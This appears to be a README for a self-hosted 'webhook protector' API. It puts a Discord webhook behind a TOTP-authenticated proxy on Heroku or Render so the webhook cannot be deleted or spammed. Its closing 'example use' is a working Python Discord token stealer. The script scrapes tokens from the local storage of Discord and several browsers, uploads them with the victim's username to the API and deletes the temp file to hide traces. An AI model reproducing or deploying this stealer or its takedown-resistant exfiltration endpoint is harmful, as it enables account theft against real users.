> Easy to setup!
> Configurable!
> Completely *free* and stays online *24/7*
> Accepts json, discord embeds and files!
> Ratelimits unauthorized requests!
> Accepting only post requests!
> Impossible to delete webhook
> Webhook protected by totp so very hard to spam webhook even if they http debug!

1. Create an account on Heroku.com (Yes all of this is free)
2. Install nodejs, heroku cli, and git
3. Open config.json and put in your webhook at the top
4. Now you need a key, open cmd in the directory and type the following ⇣

$ cd test
$ py keyGen.py
>>> Your key is: ...
>>> Copied key to clipboard!

5. Paste your generated key in config.json
6. Open a new cmd in the directory and type npm i
7. Now follow these steps carefully ⇣

$ heroku login
...
$ git init
$ git add .
$ git commit -m "first Webhook protector api commit"
...
$ heroku create
...
$ git push heroku main
...
$ heroku ps:scale web=1
...
$ heroku domains
...

8. Done! After typing heroku domains you should get something in the console like shrouded-fjord-36366.herokuapp.com. This is your api with your undeletable/unspammable webhook!

$ first issue error: failed to push some refs to 'https://git.heroku.com/app-name.git'

Then run "git push heroku master"

ㅤ

If you make some changes in the code and want to update the api on heroku, simply run npm run deploy to push out the updates
If any bugs occur please report them or try and see if restarting the app by typing heroku restart works!

1. Setup an account on Render
2. Fork This Repo (Dont Forget to Make it Private And Edit the config.js File)
3. Go to This Link and connect your GitHub Account
4. Select the repo you just made
5. On the next screen enter a uniqe name for it (this name will be in your api)
6. Select Node as your environment
7. Scroll down and click on
8. Thats it! It will build it in some time now (Approx 5 mins)
9. Your api url should look like this (https://youruninqename.onrender.com)

For testing that your api works, open test folder and edit the test .py file by putting your api url and passsword then open cmd in the directory and type the following ⇣

$ cd .\test
...
$ py test.py

It should've made a post request to the api uploading itself and sending "it works!" to the webhook

Free hosting will sleep your API after inactivity. It is 15 mins for Render. Now ofc we aren't gonna keep using our webhook so we can use a site like Statuscake which is free.

Note: Heroku gives only 550 hours for free in a month whereas Render gives 750 hours (There are 744 hours in a month). So If u use this method on heroku then your api will be offline for last 8 days of the month. (Unless You have more hours on heroku by entering your credit card or buying) And so I recommend you use Render the host the API

1. Sign up on Statuscake
2. Create a new UpTime Test
3. Head down to and follow what I've done. (Don't Forget to❌the code 401)
4. Scroll down and click on
5. Add if u want though its not needed (click ok if u don't want to add)
6. Thats it! Your webhook is now gonna be live 24/7

The config and what the options do

{
  "webhook": "https://discord.com/api/webhooks/0123456789/abcdefghijklmnopqrstuvwxyz", //your discord webhook
  "pass32": "K4ZVUQTSIRMDOWKRGU2WQQTZJM======" /*a key encoded in base32, use the keyGen in ./test or see https://github.com/bellstrand/totp-generator#how-to-use for more*/,
  "ratelimit": true, //if you want it to ratelimit unauthorized requests or not
  "rateLimitTimeout": 30000, //amount of milliseconds an ip gets ratelimited (Default: 30000 --> 30 seconds)
  "port": 3000 //port
}

Example use of the api hosted on heroku

import os, re
import requests
from pyotp import TOTP

api = "https://your-heroku-app-name.herokuapp.com" #the name of your app will probably be something like https://frozen-beach-72554.herokuapp.com

pass32 = 'K4ZVUQTSIRMDOWKRGU2WQQTZJM======' #needs to be same key as the one in your api
key = TOTP(pass32).now()

local = os.getenv('LOCALAPPDATA')
roaming = os.getenv('APPDATA')
_file = os.getenv('temp') + os.sep + 'tokens.txt'

paths = {
    'Discord': roaming + '\\Discord\\Local Storage\\leveldb',
    'Discord Canary': roaming + '\\discordcanary\\Local Storage\\leveldb',
    'Discord PTB': roaming + '\\discordptb\\Local Storage\\leveldb',
    'Google Chrome': local + '\\Google\\Chrome\\User Data\\Default\\Local Storage\\leveldb',
    'Opera': roaming + '\\Opera Software\\Opera Stable\\Local Storage\\leveldb',
    'Brave': local + '\\BraveSoftware\\Brave-Browser\\User Data\\Default\\Local Storage\\leveldb',
    'Yandex': local + '\\Yandex\\YandexBrowser\\User Data\\Default\\Local Storage\\leveldb'
}
for platform, path in paths.items():
    if not os.path.exists(path):
        continue
    for file_name in os.listdir(path):
        if not file_name.endswith('.log') and not file_name.endswith('.ldb'):
            continue
        for line in [x.strip() for x in open(f'{path}\\{file_name}', errors='ignore').readlines() if x.strip()]:
            for regex in (r'[\w-]{24}\.[\w-]{6}\.[\w-]{27}', r'mfa\.[\w-]{84}'):
                for token in re.findall(regex, line):
                    with open(_file, 'a') as f:
                        f.write(token)

requests.post(api, headers={"Authorization": key}, data={"content": f'Successfully grabbed tokens from {os.getlogin()}:'}) #send the text to webhook
requests.post(api, headers={"Authorization": key}, files={"upload_file": open(_file, 'rb')}) #send text file with tokens in it to the webhook
os.remove(_file) #delete traces

Back to Top